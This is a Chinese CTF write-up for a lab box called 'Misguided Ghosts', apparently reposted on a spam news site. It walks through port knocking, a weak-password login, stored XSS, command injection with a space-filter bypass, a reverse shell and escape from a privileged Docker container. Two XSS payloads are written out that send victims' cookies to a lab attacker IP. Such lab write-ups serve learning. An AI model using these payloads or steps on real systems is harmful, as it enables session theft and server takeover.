当前位置: 首页 > news >正文

网站建设后台cms管理系统方案参考网是合法网站吗?

网站建设后台cms管理系统方案,参考网是合法网站吗?,淄博优化推广,wordpress跳转外链插件Misguided Ghosts 端口扫描 循例nmap FTP枚举 直接登anonymous,有几个文件,下下来 info.txt 我已经包含了您要求的所有网络信息,以及一些我最喜欢的笑话。- 帕拉摩尔该信息可能指的是pcapng文件 jokes.txt Taylor: Knock, knock. Josh: …

Misguided Ghosts


端口扫描

循例nmap

在这里插入图片描述

FTP枚举

直接登anonymous,有几个文件,下下来

在这里插入图片描述

info.txt

我已经包含了您要求的所有网络信息,以及一些我最喜欢的笑话。- 帕拉摩尔

该信息可能指的是pcapng文件

jokes.txt

Taylor: Knock, knock.
Josh:   Who's there?
Taylor: The interrupting cow.
Josh:   The interrupting cow--
Taylor: MooJosh:   Knock, knock.
Taylor: Who's there?
Josh:   Adore.
Taylor: Adore who?
Josh:   Adore is between you and I so please open up!

这里的暗示很明显,端口敲门无疑

端口敲门

打开pacapng文件分析,最终联合上文信息猜测应该有端口敲门的数据包

当向关闭的tcp端口发送 syn的时候,总是会回复RST ACK,所以可以基本确定这就是端口敲门的数据包

在这里插入图片描述

nc一把梭

在这里插入图片描述

nmap再扫一遍,开了个8080,注意是https的

在这里插入图片描述

Web枚举

进到8080的https

在这里插入图片描述

gobuster扫一下

在这里插入图片描述

在这里插入图片描述

/console可以执行python代码,但需要先输入pin,但我们目前并没有

在这里插入图片描述

到login看一下,正常的登录框,但我们目前没有任何凭据以及用户名,根据之前的经验,看一下https的证书

在这里插入图片描述

这里有个邮箱,zac应该就是用户名,拿去尝试弱口令

使用zac:zac凭据成功登录

在这里插入图片描述

这里有一条信息:

Create a post below; admins will check every two minutes so don't be rude.

这意味着我们可以尝试xss来捕获admin的cookie

<script>fetch('http://10.14.39.48:8000/?cookie=' + btoa(document.cookie));</script>

发现有过滤

在这里插入图片描述

fetch和iframe的请求似乎都会被拦截,这里通过img可以通过

&lt;scscriptript&gt;var a = new Image();a.src = 'http://10.14.39.48:8000/?cookie='+btoa(document.cookie);&lt;/scscriptript&gt;

在这里插入图片描述

稍等一会,admin就会到来

在这里插入图片描述

base64解码后把cookie丢到cookie editor

在这里插入图片描述

似乎也没啥东西,带着cookie再扫一遍目录

在这里插入图片描述

在这里插入图片描述

/photos,一个文件上传

在这里插入图片描述

尝试上传的时候发现图片都传不上去,回显是显示文件不存在

在这里插入图片描述

根据之前的经验,可能是执行的类似ls的命令,尝试绕过

在这里插入图片描述

能够rce,尝试reverse shell

甚至还有空格过滤

在这里插入图片描述

通过${IFS}轻松绕过

在这里插入图片描述

Docker逃逸

进来就看见.dockerenv

在这里插入图片描述

可以看到使用了–privileged以特权身份运行

根据HackTricks的Trick,我们能够访问到所有设备,我们可以直接把宿主机的disk直接挂载过来

在这里插入图片描述

fdisk查看, 有个19GB的,是它没错了

在这里插入图片描述

mount挂载过来

在这里插入图片描述

成功拿到user和root flag

在这里插入图片描述

http://www.ds6.com.cn/news/104982.html

相关文章:

  • 视频类html网站模板软件拉新推广平台
  • 如何维护网站百度云搜索引擎网站
  • 邯郸网站设计制作连接交换
  • 南通医院网站建设方案去除痘痘怎么有效果
  • 网站建设掌握技能网络营销的四种形式
  • 章丘公司做网站2022世界足球排行榜
  • 网站设置搜索关键字情感式软文广告
  • 做草坪绿化网站甘肃seo技术
  • 外贸独立网站做仿品微指数官网
  • 做字幕模板下载网站站长工具seo综合查询关键词
  • 电商网站建设前的市场分析内容域名检测查询
  • 电商网站计划培训机构退费纠纷一般怎么解决
  • 电子商务网站建设有哪些流程互联网搜索引擎
  • 用外链技术做视频网站windows7优化大师下载
  • 网页制作与设计中什么是divseo关键词优化排名
  • wordpress数据库响应时间过长惠州seo关键词推广
  • 网站设计与网页制作正文白嫖永久服务器
  • 凡科网可以自己做网站吗软文写作平台发稿
  • 网站建设前置审批做seo排名好的公司
  • 做网站设计是什么专业东莞做网站推广的公司
  • 四川省工程建设信息网站百度推广外推联系方式
  • 购物网站宣传方案上海搜索引擎优化1
  • 武汉做网站哪家好seo优化易下拉霸屏
  • 做原型交互的网站工具怎么把产品快速宣传并推广
  • 免费做ppt的网站网站关键词优化排名公司
  • 购物网站建设方案无锡百度seo优化
  • 时事热点新闻seo网络推广教程
  • 网站制作与app开发哪个要难一点足球排名最新排名世界
  • h5 政府网站百度账号管理
  • 深圳营销建网站公司不属于网络推广方法